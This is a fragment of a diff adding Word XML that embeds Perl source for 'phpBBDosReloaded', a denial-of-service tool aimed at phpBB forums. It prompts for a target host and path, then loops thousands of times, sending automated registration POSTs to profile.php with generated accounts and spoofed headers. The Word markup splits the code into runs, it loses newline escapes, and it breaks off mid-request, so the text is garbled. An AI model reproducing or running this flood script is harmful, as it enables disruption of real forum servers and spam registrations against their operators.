+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Initialized X </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>$x = 0;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> q( </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>phpBBDosReloaded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> - Originally </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NsT-phpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DoS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> by </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>HaCkZaTaN</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">  Recoded by Albanian Hackers Group &amp; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>h4cky0u</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Security Forums</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">); </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> q(Host |without-&gt; http://www.| ); </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">$host = &lt;STDIN&gt;; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>chop</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ($host);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> q(Path |example-&gt; /phpBB2/ or /| ); </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>pth</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = &lt;STDIN&gt;; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>chop</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ($</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pth</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Visual Confirmation is enabled</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>| )</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">$type = &lt;STDIN&gt;; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>chop</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ($type);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Tipi </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>regjistrim</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>if(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>$type == 1){</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## User Loop for 9999 loops (enough for Flood </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>xDDDD</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>while(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">$x != 9999) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Antari</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> q </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>regjistrohet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>automatikisht</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "X" </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>uname</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = "username=AHG__</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>" .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "$x";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Emaili</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> q </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>regjistrohet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ne </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bazn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "X" </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>umail</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = "&amp;email=AHG__</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>" .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "$x";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>postit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = "$uname"."$umail"."%40ahg-crew.org&amp;new_password=0123456&amp;password_confirm</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>=0123456&amp;icq=&amp;aim=N%2FA&amp;msn=&amp;yim=&amp;website=&amp;location=&amp;occupation=&amp;interes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ts</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>=&amp;signature=&amp;viewemail=0&amp;hideonline=0&amp;notifyreply=0&amp;notifypm=1&amp;popup_p</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>m=1&amp;attachsig=1&amp;allowbbcode=1&amp;allowhtml=0&amp;allowsmilies=1&amp;language=englis</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>h&amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>style=2&amp;timezone=0&amp;dateformat=D+M+d%2C+Y+g%3Ai+a&amp;mode=register&amp;agreed=</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>true&amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>coppa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=0&amp;submit=Submit";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lrg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = length $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>postit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>my</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock = new IO::Socket::INET ( </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">                                 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PeerAddr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> =&gt; "$host", </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">                                 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PeerPort</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> =&gt; "80", </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">                                 Proto =&gt; "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">", </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">                                ); </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>die</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nNuk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mundem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>te</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lidhemi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> me </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hostin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sepse</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sht</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dosirat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ose</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nuk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>egziston</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>: $!n" unless $sock;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">## Sending Truth Socket </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>The</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> HTTP Commands For Register a User in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>phpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Forums </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "POST $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pth</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>"."</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>profile.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> HTTP/1.1n"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "Host: $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hostn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "Accept: image/gif, image/x-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>xbitmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, image/jpeg, </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>image/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pjpeg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, application/x-shockwave-flash, application/vnd.ms-excel, </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>application/vnd.ms-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>powerpoint</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, application/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msword</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, */*n"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Referer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>: $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hostn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "Accept-Language: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>en-usn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "Content-Type: application/x-www-form-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>urlencodedn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "Accept-Encoding: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gzip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>deflaten</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>en</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">-US; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>rv</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>:1.7.8</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">) Gecko/20050511 Firefox/1.0.4n"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "Connection: Keep-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Aliven</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> $sock "Cache-Control: no-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cachen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
